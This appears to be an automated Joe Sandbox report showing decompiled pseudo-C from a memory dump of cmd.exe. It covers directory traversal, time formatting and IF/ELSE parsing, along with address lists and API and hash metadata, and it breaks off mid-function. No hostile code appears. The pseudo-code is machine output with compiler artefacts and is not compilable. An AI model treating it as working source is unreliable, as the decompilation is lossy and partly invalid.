0x001be2ad
0x001be1cd
0x001be1cd
0x001be1d0
0x001be1d0
0x001be1d3
0x001be1d3
0x001be1d6
0x001be1d9
0x001be1e0
0x001be1e4
0x001cbd87
0x001cbd87
0x001cbd8a
0x001cbd8f
0x001cbda5
0x001cbdad
0x001cbdaf
0x001cbdb7
0x001cbdb9
0x001cbdc5
0x001cbdc5
0x001cbdd1
0x001cbdd3
0x001cbddb
0x001cbde6
0x001cbdeb
0x001cbdff
0x001cbded
0x001cbded
0x001cbdef
0x001cbdf8
0x001cbdf8
0x001cbe05
0x001cbe0d
0x001cbe13
0x00000000
0x001cbe13
0x001cbd91
0x001cbd94
0x001cbd94
0x001cbd97
0x001cbd9a
0x001cbda3
0x00000000
0x001cbda3
0x001be1e4
0x00000000
0x001be24b
0x001be1bc
0x001be1c2
0x001be1cb
0x001be209
0x001be209
0x00000000
0x001be1cb
0x001be186
0x001be186
0x001be189
0x001be18a
0x001be192
0x001be198
0x00000000
0x001be198
0x001be156

APIs

memset.MSVCRT ref: 001BE090

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

wcschr.MSVCRT ref: 001BE0F3
wcschr.MSVCRT ref: 001BE10B
_wcsicmp.MSVCRT ref: 001BE179
??_V@YAXPAX@Z.MSVCRT ref: 001BE1ED
iswspace.MSVCRT ref: 001BE28B
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00007FE7,?,?,00000000), ref: 001BE2ED

Strings

=,;, xrefs: 001BE29A
=,;+/[] ", xrefs: 001BE0EE
:.\, xrefs: 001BE106

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memsetwcschr$AttributesFile_wcsicmpiswspace
String ID: :.\$=,;$=,;+/[] "
API String ID: 313872294-843887632
Opcode ID: 1b4a1d5a1160fd58bdca3544e11449f28d72d1166fe87504f1df9a2d28bc2c64
Instruction ID: fa142386150ecf8d9431514d3b026199373849cbc4069ffee719999ebdf5ca75
Opcode Fuzzy Hash: 1b4a1d5a1160fd58bdca3544e11449f28d72d1166fe87504f1df9a2d28bc2c64
Instruction Fuzzy Hash: A5A10230A042149BDF24DFA8DC85BFA77F4AF65314F2501D9E806A7291DB30DE85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001BB89C Relevance: 18.3, APIs: 12, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E001BB89C(WCHAR* __ecx, short* __edx, signed int _a4) {
				signed int _v12;
				int _v24;
				char _v28;
				void* _v32;
				void _v552;
				struct _WIN32_FIND_DATAW _v1144;
				int _v1148;
				signed int _v1152;
				void* _v1156;
				char _v1160;
				intOrPtr _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t71;
				intOrPtr _t74;
				void* _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				signed char _t80;
				short _t83;
				short _t84;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t110;
				signed int _t116;
				WCHAR* _t119;
				intOrPtr* _t124;
				WCHAR* _t129;
				signed int _t131;
				intOrPtr* _t134;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t140;
				signed int _t144;
				short* _t146;
				void* _t148;
				short* _t150;
				void* _t151;
				int _t154;
				intOrPtr* _t155;
				void* _t159;
				signed int _t160;
				void* _t161;

				_t145 = __edx;
				_t71 =  *0x1dd0b4; // 0xea614d48
				_v12 = _t71 ^ _t160;
				_t119 = __ecx;
				_v1152 = _a4;
				_t155 = __ecx;
				_v1148 = 0;
				_t150 =  &(__ecx[1]);
				do {
					_t74 =  *_t155;
					_t155 = _t155 + 2;
				} while (_t74 != 0);
				_t157 = _t155 - _t150 >> 1;
				if((_t155 - _t150 >> 1) + 2 > __edx) {
					L10:
					_t76 = 0;
					L8:
					_pop(_t151);
					return E001C6FD0(_t76, _t119, _v12 ^ _t160, _t145, _t151, _t157);
				}
				_t124 = __ecx;
				_t145 =  &(__ecx[1]);
				do {
					_t78 =  *_t124;
					_t124 = _t124 + 2;
				} while (_t78 != 0);
				_t157 = _v1152;
				_t126 = _t124 - _t145 >> 1;
				_t79 = (_t124 - _t145 >> 1) - 2;
				_v1164 = _t79;
				 *_t157 = _t79;
				_t80 = GetFileAttributesW(__ecx);
				if(_t80 == 0xffffffff) {
					_push(0);
					_push(GetLastError());
					E001BC5A2(_t126);
					goto L10;
				}
				if((_t80 & 0x00000010) != 0) {
					_t129 = _t119;
					_t146 =  &(_t129[1]);
					do {
						_t83 =  *_t129;
						_t129 =  &(_t129[1]);
					} while (_t83 != 0);
					_t131 = _t129 - _t146 >> 1;
					_t84 = 0x5c;
					_push(0x2a);
					if( *((intOrPtr*)(_t119 + _t131 * 2 - 2)) != _t84) {
						 *((short*)(_t119 + 4 + _t131 * 2)) = 0;
						_pop(_t145);
					} else {
						_t145 = 0;
						_pop(_t84);
					}
					_t119[_t131] = _t84;
					 *(_t119 + 2 + _t131 * 2) = _t145;
					_t86 = FindFirstFileW(_t119,  &_v1144);
					_v1156 = _t86;
					if(_t86 != 0xffffffff) {
						_t154 = 1;
						do {
							_t131 = ".";
							_t87 =  &(_v1144.cFileName);
							while(1) {
								_t145 =  *_t87;
								if(_t145 !=  *_t131) {
									break;
								}
								if(_t145 == 0) {
									L26:
									_t88 = 0;
									L28:
									if(_t88 == 0) {
										goto L57;
									}
									_t131 = L"..";
									_t96 =  &(_v1144.cFileName);
									while(1) {
										_t145 =  *_t96;
										if(_t145 !=  *_t131) {
											break;
										}
										if(_t145 == 0) {
											L34:
											_t97 = 0;
											L36:
											if(_t97 == 0) {
												goto L57;
											}
											_t134 =  &(_v1144.cFileName);
											_t145 = _t134 + 2;
											do {
												_t98 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t98 != _v1148);
											_t135 = _t134 - _t145;
											_t131 = _t135 >> 1;
											if(_t135 == 0) {
												goto L57;
											}
											if((_v1144.dwFileAttributes & 0x00000010) != 0) {
												_t99 =  *_t157;
												if(_t99 <= _t131) {
													_t99 = _t131;
												}
												 *_t157 = _t99;
												goto L57;
											}
											_v28 = 1;
											_v32 = 0;
											_v24 = 0x104;
											memset( &_v552, 0, 0x104);
											_t161 = _t161 + 0xc;
											if(E001C0C70( &_v552, ((0 | _v28 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
												SetLastError(8);
												L60:
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												L61:
												_t157 = GetLastError();
												FindClose(_v1156);
												if(_t154 != 0) {
													goto L10;
												}
												if(_t157 == 0x12) {
													goto L7;
												}
												_push(0);
												goto L64;
											}
											E001C0D89(_t145, _t119);
											_t148 = _v32;
											_t138 = _t148;
											if(_t148 == 0) {
												_t138 =  &_v552;
											}
											_t159 = _t138 + 2;
											do {
												_t110 =  *_t138;
												_t138 = _t138 + 2;
											} while (_t110 != _v1148);
											_t140 = _t138 - _t159 >> 1;
											if(_t148 == 0) {
												_t148 =  &_v552;
											}
											 *((short*)(_t148 + _t140 * 2 - 2)) = 0;
											E001C0CF2(_t148,  &(_v1144.cFileName));
											_t142 = _v32;
											if(_v32 == 0) {
												_t142 =  &_v552;
											}
											_t145 = _v24;
											if(E001BB89C(_t142, _v24,  &_v1160) == 0) {
												goto L60;
											} else {
												_t157 = _v1152;
												_t144 = _v1164 + _v1160;
												_t116 =  *_t157;
												if(_t116 <= _t144) {
													_t116 = _t144;
												}
												 *_t157 = _t116;
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												goto L57;
											}
										}
										_t145 =  *((intOrPtr*)(_t96 + 2));
										_t33 = _t131 + 2; // 0x2e
										if(_t145 !=  *_t33) {
											break;
										}
										_t96 = _t96 + 4;
										_t131 = _t131 + 4;
										if(_t145 != 0) {
											continue;
										}
										goto L34;
									}
									asm("sbb eax, eax");
									_t97 = _t96 | 0x00000001;
									goto L36;
								}
								_t145 =  *((intOrPtr*)(_t87 + 2));
								_t30 = _t131 + 2; // 0x200000
								if(_t145 !=  *_t30) {
									break;
								}
								_t87 = _t87 + 4;
								_t131 = _t131 + 4;
								if(_t145 != 0) {
									continue;
								}
								goto L26;
							}
							asm("sbb eax, eax");
							_t88 = _t87 | 0x00000001;
							goto L28;
							L57:
							_t154 = FindNextFileW(_v1156,  &_v1144);
						} while (_t154 != 0);
						goto L61;
					} else {
						_t157 = GetLastError();
						FindClose(0xffffffff);
						if(_t157 == 2 || _t157 == 0x12) {
							goto L7;
						} else {
							_push(0);
							L64:
							_push(_t157);
							E001BC5A2(_t131);
							_t76 = 0;
							goto L8;
						}
					}
				}
				L7:
				_t76 = 1;
				goto L8;
			}

0x001bb89c
0x001bb8a7
0x001bb8ae
0x001bb8b5
0x001bb8b7
0x001bb8be
0x001bb8c3
0x001bb8c9
0x001bb8cc
0x001bb8cc
0x001bb8cf
0x001bb8d2
0x001bb8d9
0x001bb8e0
0x001c9da8
0x001c9da8
0x001bb928
0x001bb92b
0x001bb938
0x001bb938
0x001bb8e6
0x001bb8ea
0x001bb8ed
0x001bb8ed
0x001bb8f0
0x001bb8f3
0x001bb8f8
0x001bb900
0x001bb903
0x001bb906
0x001bb90c
0x001bb90e
0x001bb917
0x001c9d99
0x001c9da0
0x001c9da1
0x00000000
0x001c9da7
0x001bb91f
0x001c9daf
0x001c9db1
0x001c9db4
0x001c9db4
0x001c9db7
0x001c9dba
0x001c9dc1
0x001c9dc5
0x001c9dc6
0x001c9dcd
0x001c9dd6
0x001c9ddb
0x001c9dcf
0x001c9dcf
0x001c9dd1
0x001c9dd1
0x001c9ddc
0x001c9de8
0x001c9ded
0x001c9df3
0x001c9dfc
0x001c9e28
0x001c9e29
0x001c9e29
0x001c9e2e
0x001c9e34
0x001c9e34
0x001c9e3a
0x00000000
0x00000000
0x001c9e3f
0x001c9e56
0x001c9e56
0x001c9e5f
0x001c9e61
0x00000000
0x00000000
0x001c9e67
0x001c9e6c
0x001c9e72
0x001c9e72
0x001c9e78
0x00000000
0x00000000
0x001c9e7d
0x001c9e94
0x001c9e94
0x001c9e9d
0x001c9e9f
0x00000000
0x00000000
0x001c9ea5
0x001c9eab
0x001c9eae
0x001c9eae
0x001c9eb1
0x001c9eb4
0x001c9ebd
0x001c9ebf
0x001c9ec1
0x00000000
0x00000000
0x001c9ece
0x001c9fb6
0x001c9fba
0x001c9fbc
0x001c9fbc
0x001c9fbe
0x00000000
0x001c9fbe
0x001c9ed6
0x001c9edf
0x001c9eea
0x001c9eee
0x001c9efb
0x001c9f14
0x001c9fe1
0x001c9fe7
0x001c9fea
0x001c9ff0
0x001c9ff1
0x001c9ffd
0x001c9fff
0x001ca007
0x00000000
0x00000000
0x001ca010
0x00000000
0x00000000
0x001ca018
0x00000000
0x001ca018
0x001c9f21
0x001c9f26
0x001c9f29
0x001c9f2d
0x001c9f2f
0x001c9f2f
0x001c9f35
0x001c9f38
0x001c9f38
0x001c9f3b
0x001c9f3e
0x001c9f49
0x001c9f4d
0x001c9f4f
0x001c9f4f
0x001c9f57
0x001c9f69
0x001c9f6e
0x001c9f73
0x001c9f75
0x001c9f75
0x001c9f7b
0x001c9f8c
0x00000000
0x001c9f8e
0x001c9f8e
0x001c9f9a
0x001c9fa0
0x001c9fa4
0x001c9fa6
0x001c9fa6
0x001c9fab
0x001c9fad
0x001c9fb3
0x00000000
0x001c9fb3
0x001c9f8c
0x001c9e7f
0x001c9e83
0x001c9e87
0x00000000
0x00000000
0x001c9e89
0x001c9e8c
0x001c9e92
0x00000000
0x00000000
0x00000000
0x001c9e92
0x001c9e98
0x001c9e9a
0x00000000
0x001c9e9a
0x001c9e41
0x001c9e45
0x001c9e49
0x00000000
0x00000000
0x001c9e4b
0x001c9e4e
0x001c9e54
0x00000000
0x00000000
0x00000000
0x001c9e54
0x001c9e5a
0x001c9e5c
0x00000000
0x001c9fc0
0x001c9fd3
0x001c9fd5
0x00000000
0x001c9dfe
0x001c9e06
0x001c9e08
0x001c9e11
0x00000000
0x001c9e20
0x001c9e20
0x001ca019
0x001ca019
0x001ca01a
0x001ca020
0x00000000
0x001ca022
0x001c9e11
0x001c9dfc
0x001bb925
0x001bb927
0x00000000

APIs

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FE7,00000000), ref: 001BB90E

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1fdc30d0f04b6908049956f78473e69a5269731840e8b9810c9f17d13f08e812
Instruction ID: 22f0b375b4e62abd980f14f435ee693ff42c7c8221a50fe2e82c992d72707231
Opcode Fuzzy Hash: 1fdc30d0f04b6908049956f78473e69a5269731840e8b9810c9f17d13f08e812
Instruction Fuzzy Hash: 3091EF729001168ADB28EB68C849BFAB7B5EF74310F1545ADE90AD7240EB31DE81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001B96A0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 237
timeCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001B96A0(void* __ecx, void* __edx, signed int _a4, unsigned int _a8) {
				signed int _v8;
				short _v76;
				short _v332;
				signed short _v334;
				signed short _v336;
				signed int _v338;
				signed int _v340;
				struct _SYSTEMTIME _v348;
				signed int _v352;
				intOrPtr _v356;
				void* _v360;
				struct _FILETIME _v368;
				struct _FILETIME _v376;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				char* _t67;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed short _t80;
				signed int _t85;
				signed int _t88;
				signed int _t92;
				signed int _t99;
				void* _t106;
				void* _t111;
				signed int _t112;
				signed int _t114;
				void* _t116;
				void* _t119;
				signed int _t121;
				signed int _t122;
				void* _t123;
				signed int _t124;
				signed int _t126;
				signed int _t127;
				intOrPtr* _t131;
				void* _t133;
				int _t134;
				void* _t136;
				signed int _t138;
				signed int _t140;
				signed int _t141;
				void* _t142;

				_t58 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t58 ^ _t141;
				_t139 = _a4;
				_t136 = __edx;
				if(__ecx != 0) {
					E001D3C49(__ecx,  &_v368);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v368);
				}
				FileTimeToLocalFileTime( &_v368,  &_v376);
				FileTimeToSystemTime( &_v376,  &_v348);
				if(_t136 != 1) {
					__eflags =  *0x1f3cc9;
					if( *0x1f3cc9 == 0) {
						__eflags =  *0x1dd0cc;
						_t67 = "a";
						_t114 = _v340 & 0x0000ffff;
						if( *0x1dd0cc == 0) {
							_t67 = " ";
						} else {
							__eflags = _t114 - 0xc;
							if(__eflags < 0) {
								__eflags = _t114;
								if(_t114 == 0) {
									_t114 = 0xc;
								}
							} else {
								if(__eflags > 0) {
									__eflags = _t114;
								}
								_t67 = "p";
							}
						}
						_push(_t67);
						_push(_v338 & 0x0000ffff);
						_push(0x1df81c);
						E001C274C( &_v76, 0x20, L"%02d%s%02d%s", _t114);
						L48:
						__eflags = _t139;
						if(_t139 != 0) {
							_t130 = _a8;
							E001C1040(_t139, _a8,  &_v76);
							_t116 = _t139 + 2;
							do {
								_t73 =  *_t139;
								_t139 = _t139 + 2;
								__eflags = _t73;
							} while (_t73 != 0);
							goto L6;
						}
						_t131 =  &_v76;
						_t119 = _t131 + 2;
						do {
							_t76 =  *_t131;
							_t131 = _t131 + 2;
							__eflags = _t76;
						} while (_t76 != 0);
						_t130 = _t131 - _t119 >> 1;
						_t74 = E001C2616( &_v76, _t131 - _t119 >> 1);
						goto L7;
					}
					_v352 = 0;
					_t79 = GetLocaleInfoW(E001C41A4(), 0x1003,  &_v332, 0x80);
					__eflags = _t79;
					if(_t79 != 0) {
						L20:
						_t80 = _v332;
						_t136 =  &_v332;
						__eflags = _t80;
						if(_t80 == 0) {
							L37:
							_t85 = GetTimeFormatW(E001C41A4(), 2,  &_v348,  &_v332,  &_v76, 0x20);
							__eflags = _t85;
							if(_t85 == 0) {
								_v76 = _t85;
							}
							goto L48;
						}
						_t112 = _t80 & 0x0000ffff;
						_t121 = 0;
						__eflags = 0;
						do {
							__eflags = _t112 - 0x27;
							if(_t112 != 0x27) {
								__eflags = _t121;
								if(_t121 == 0) {
									__eflags = _t112 - 0x68;
									if(_t112 == 0x68) {
										L29:
										_t122 = 0;
										__eflags = 0;
										do {
											_t136 = _t136 + 2;
											_t122 = _t122 + 1;
											__eflags =  *_t136 - _t112;
										} while ( *_t136 == _t112);
										_t133 = _t136 +  ~_t122 * 2;
										_v360 = _t133;
										_t136 = _t133 + 2;
										__eflags = _t122 - 1;
										if(_t122 != 1) {
											L35:
											_t121 = _v352;
											goto L36;
										}
										_t123 = _t133;
										_v356 = _t123 + 2;
										do {
											_t92 =  *_t123;
											_t123 = _t123 + 2;
											__eflags = _t92;
										} while (_t92 != 0);
										_t124 = _t123 - _v356;
										__eflags = _t124;
										memmove(_t136, _t133, 2 + (_t124 >> 1) * 2);
										_t142 = _t142 + 0xc;
										 *_v360 = _t112;
										goto L35;
									}
									__eflags = _t112 - 0x48;
									if(_t112 == 0x48) {
										goto L29;
									}
									__eflags = _t112 - 0x6d;
									if(_t112 != 0x6d) {
										goto L36;
									}
									goto L29;
								}
								_t136 = _t136 + 2;
								goto L36;
							}
							_t136 = _t136 + 2;
							__eflags = _t121;
							_t121 = 0 | _t121 == 0x00000000;
							_v352 = _t121;
							L36:
							_t88 =  *(_t136 + 2) & 0x0000ffff;
							_t136 = _t136 + 2;
							_t112 = _t88;
							__eflags = _t88;
						} while (_t88 != 0);
						goto L37;
					}
					_t126 =  &_v332;
					_t134 = 0x80;
					_t138 = L"HH:mm:ss t" - _t126;
					__eflags = _t138;
					while(1) {
						_t25 = _t134 + 0x7fffff7e; // 0x7ffffffe
						__eflags = _t25;
						if(_t25 == 0) {
							break;
						}
						_t99 =  *(_t138 + _t126) & 0x0000ffff;
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						 *_t126 = _t99;
						_t126 = _t126 + 2;
						_t134 = _t134 - 1;
						__eflags = _t134;
						if(_t134 != 0) {
							continue;
						}
						L18:
						_t126 = _t126 - 2;
						__eflags = _t126;
						L19:
						__eflags = 0;
						 *_t126 = 0;
						goto L20;
					}
					__eflags = _t134;
					if(_t134 != 0) {
						goto L19;
					}
					goto L18;
				} else {
					_t127 = _v334 & 0x0000ffff;
					_t130 = 0xcccccccd * _t127 >> 0x20 >> 3;
					_push(0xcccccccd * _t127 >> 0x20 >> 3);
					_push(0x1df7fc);
					_push(_v336 & 0x0000ffff);
					_push(0x1df81c);
					_push(_v338 & 0x0000ffff);
					_push(0x1df81c);
					_push(_v340 & 0x0000ffff);
					_push(L"%2d%s%02d%s%02d%s%02d");
					if(_t139 == 0) {
						_t74 = E001C25D9();
						L7:
						return E001C6FD0(_t74, _t111, _v8 ^ _t141, _t130, _t136, _t139);
					} else {
						_push(_a8);
						_push(_t139);
						E001C274C();
						_t116 = _t139 + 2;
						do {
							_t106 =  *_t139;
							_t139 = _t139 + 2;
						} while (_t106 != 0);
						L6:
						_t140 = _t139 - _t116;
						_t139 = _t140 >> 1;
						_t74 = _t140 >> 1;
						goto L7;
					}
				}
			}

0x001b96ab
0x001b96b2
0x001b96b7
0x001b96bb
0x001b96bf
0x001d0ad6
0x001b96c5
0x001b96cc
0x001b96e0
0x001b96e0
0x001b96f4
0x001b9708
0x001b9711
0x001d0aed
0x001d0af4
0x001d0c53
0x001d0c5a
0x001d0c5f
0x001d0c66
0x001d0c84
0x001d0c68
0x001d0c68
0x001d0c6b
0x001d0c79
0x001d0c7b
0x001d0c7d
0x001d0c7d
0x001d0c6d
0x001d0c6d
0x001d0c6f
0x001d0c6f
0x001d0c72
0x001d0c72
0x001d0c6b
0x001d0c89
0x001d0c91
0x001d0c92
0x001d0ca3
0x001d0cab
0x001d0cab
0x001d0cad
0x001d0cd1
0x001d0cda
0x001d0cdf
0x001d0ce2
0x001d0ce2
0x001d0ce5
0x001d0ce8
0x001d0ce8
0x00000000
0x001d0ced
0x001d0caf
0x001d0cb2
0x001d0cb5
0x001d0cb5
0x001d0cb8
0x001d0cbb
0x001d0cbb
0x001d0cc5
0x001d0cc7
0x00000000
0x001d0cc7
0x001d0b05
0x001d0b1b
0x001d0b21
0x001d0b23
0x001d0b65
0x001d0b65
0x001d0b6c
0x001d0b72
0x001d0b75
0x001d0c27
0x001d0c43
0x001d0c49
0x001d0c4b
0x001d0c4d
0x001d0c4d
0x00000000
0x001d0c4b
0x001d0b7b
0x001d0b7e
0x001d0b7e
0x001d0b80
0x001d0b80
0x001d0b84
0x001d0b9a
0x001d0b9c
0x001d0ba3
0x001d0ba7
0x001d0bb5
0x001d0bb5
0x001d0bb5
0x001d0bb7
0x001d0bb7
0x001d0bba
0x001d0bbb
0x001d0bbb
0x001d0bc4
0x001d0bc7
0x001d0bcd
0x001d0bd0
0x001d0bd3
0x001d0c0f
0x001d0c0f
0x00000000
0x001d0c0f
0x001d0bd5
0x001d0bda
0x001d0be0
0x001d0be0
0x001d0be3
0x001d0be6
0x001d0be6
0x001d0beb
0x001d0beb
0x001d0bfd
0x001d0c09
0x001d0c0c
0x00000000
0x001d0c0c
0x001d0ba9
0x001d0bad
0x00000000
0x00000000
0x001d0baf
0x001d0bb3
0x00000000
0x00000000
0x00000000
0x001d0bb3
0x001d0b9e
0x00000000
0x001d0b9e
0x001d0b88
0x001d0b8b
0x001d0b90
0x001d0b92
0x001d0c15
0x001d0c15
0x001d0c19
0x001d0c1c
0x001d0c1e
0x001d0c1e
0x00000000
0x001d0b80
0x001d0b25
0x001d0b32
0x001d0b37
0x001d0b37
0x001d0b39
0x001d0b39
0x001d0b3f
0x001d0b41
0x00000000
0x00000000
0x001d0b43
0x001d0b47
0x001d0b4a
0x00000000
0x00000000
0x001d0b4c
0x001d0b4f
0x001d0b52
0x001d0b52
0x001d0b55
0x00000000
0x00000000
0x001d0b5d
0x001d0b5d
0x001d0b5d
0x001d0b60
0x001d0b60
0x001d0b62
0x00000000
0x001d0b62
0x001d0b59
0x001d0b5b
0x00000000
0x00000000
0x00000000
0x001b9717
0x001b9717
0x001b972c
0x001b972f
0x001b9730
0x001b9735
0x001b973d
0x001b9742
0x001b974a
0x001b974f
0x001b9750
0x001b9757
0x001d0ae0
0x001b9781
0x001b9791
0x001b975d
0x001b975d
0x001b9760
0x001b9761
0x001b9769
0x001b9770
0x001b9770
0x001b9773
0x001b9776
0x001b977b
0x001b977b
0x001b977d
0x001b977f
0x00000000
0x001b977f
0x001b9757

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,001DF830,?,00002000), ref: 001B96CC
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 001B96E0
FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 001B96F4
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 001B9708
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 001D0B1B
GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 001D0C43

Strings

%02d%s%02d%s, xrefs: 001D0C98
HH:mm:ss t, xrefs: 001D0B2B
%2d%s%02d%s%02d%s%02d, xrefs: 001B9750

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Time$File$System$FormatInfoLocalLocale
String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
API String ID: 55602301-2516506544
Opcode ID: 51b85c5bad63c327df70dbe4ba68b83ab58ee6f55c4d755717b40546a62b3626
Instruction ID: 957a078d5c7437b5647eeebe16d18a2e320431c63be9d6558311fa9cb6938024
Opcode Fuzzy Hash: 51b85c5bad63c327df70dbe4ba68b83ab58ee6f55c4d755717b40546a62b3626
Instruction Fuzzy Hash: 5B81E476A102199BCB299F54CC55BFE73B8EF58304F04429BE80AE7340EB749E85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001BD803 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E001BD803(void* __eax, WCHAR* __ebx, void* __ecx) {
				void* __edi;
				void* __esi;
				short _t56;
				short _t57;
				signed int _t59;
				intOrPtr* _t62;
				intOrPtr _t63;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				signed int _t76;
				void* _t81;
				signed int _t85;
				signed int _t86;
				WCHAR* _t90;
				signed int _t91;
				void* _t92;
				WCHAR* _t93;
				signed int _t100;
				WCHAR* _t104;
				void* _t105;
				void* _t110;
				void* _t114;
				signed int _t118;
				signed int _t125;
				WCHAR* _t132;
				void* _t138;
				signed int _t140;
				void* _t144;
				void* _t150;
				void* _t156;
				WCHAR* _t157;
				void* _t160;
				signed int _t162;
				signed int _t165;
				signed int _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				signed int _t171;
				signed int _t173;
				void* _t174;
				signed int _t175;
				signed int _t177;
				signed int _t180;

				_t104 = __ebx;
				_t157 = 0;
				__imp___wcsicmp(L"IF/?", 0x1efaa0, _t156, _t170, __ecx);
				_t186 = __eax;
				if(__eax == 0) {
					 *0x1efaa4 = 0;
					_t157 = 1;
				}
				_t110 = 0x2c;
				_t171 = E001BE9A0(_t110, _t186);
				if(_t157 != 0) {
					_t56 = 0x2f;
					 *0x1efaa0 = _t56;
					_t57 = 0x3f;
					 *0x1efaa2 = _t57;
					 *0x1efaa4 = 0;
				} else {
					E001BF030(0);
				}
				_t149 = 0x2c;
				_t59 = E001BDCE1(_t104, _t149, _t157);
				if(_t59 != 0) {
					 *(_t171 + 0x38) =  *(_t171 + 0x38) & 0x00000000;
					 *_t171 = 0x3c;
					goto L13;
				} else {
					_t160 = 0;
					if( *0x1f3cc9 == _t59) {
						L6:
						_t149 = 0;
						E001BF300(_t59, 0, 0, 0);
					} else {
						__imp___wcsicmp(0x1efaa0, L"/I");
						if(_t59 == 0) {
							_t160 = 1;
						} else {
							goto L6;
						}
					}
					_t62 = E001BCDA2(0);
					 *((intOrPtr*)(_t171 + 0x3c)) = _t62;
					if(_t62 != 0 && _t160 != 0) {
						__eflags =  *_t62 - 0x38;
						if( *_t62 == 0x38) {
							_t62 =  *((intOrPtr*)(_t62 + 0x3c));
						}
						 *((intOrPtr*)(_t62 + 0x40)) = 2;
					}
					_t114 = 0x2c;
					_t63 = E001BDC74(_t104, _t114);
					 *((intOrPtr*)(_t171 + 0x40)) = _t63;
					if(_t63 == 0) {
						E001D82EB(_t114);
					}
					if(E001BEEC8() == 0) {
						L13:
						return _t171;
					} else {
						_t66 = E001BF030(0);
						__imp___wcsicmp(L"ELSE", 0x1efaa0);
						if(_t66 == 0) {
							_t118 =  *0x1efa8c +  *0x1efa8c;
							_t68 = E001C00B0(_t118);
							__eflags = _t68;
							if(_t68 == 0) {
								E001D9287(_t118);
								__imp__longjmp(0x1eb8b8, 1);
								asm("int3");
								while(1) {
									L58:
									 *((short*)(_t149 + _t118 * 2)) = 0;
									while(1) {
										_t71 =  *(_t171 + 0x14);
										_t171 = _t71;
										__eflags = _t71;
										if(_t71 == 0) {
											break;
										}
										_t119 =  *(_t171 + 4);
										_t162 =  *(_t171 + 4);
										_t150 = _t162 + 2;
										do {
											_t72 =  *_t162;
											_t162 = _t162 + 2;
											__eflags = _t72 - _t104;
										} while (_t72 != _t104);
										_t73 = E001C22C0(_t104, _t119);
										_t149 = (_t162 - _t150 >> 1) + 1;
										E001C1040( *(_t171 + 4), (_t162 - _t150 >> 1) + 1, _t73);
										__eflags =  *((intOrPtr*)(_t171 + 8)) - _t104;
										if( *((intOrPtr*)(_t171 + 8)) == _t104) {
											_t149 =  *(_t171 + 4);
											_t140 = _t149;
											_t168 = _t140 + 2;
											do {
												_t75 =  *_t140;
												_t140 = _t140 + 2;
												__eflags = _t75 - _t104;
											} while (_t75 != _t104);
											_t118 = (_t140 - _t168 >> 1) - 1;
											__eflags = _t118 - 1;
											if(_t118 > 1) {
												__eflags =  *((short*)(_t149 + _t118 * 2)) - 0x3a;
												if( *((short*)(_t149 + _t118 * 2)) == 0x3a) {
													goto L58;
												}
											}
										}
									}
									_t165 =  *(_t180 - 0x228);
									_t173 =  *(_t180 - 0x224);
									__eflags = _t173 - 3;
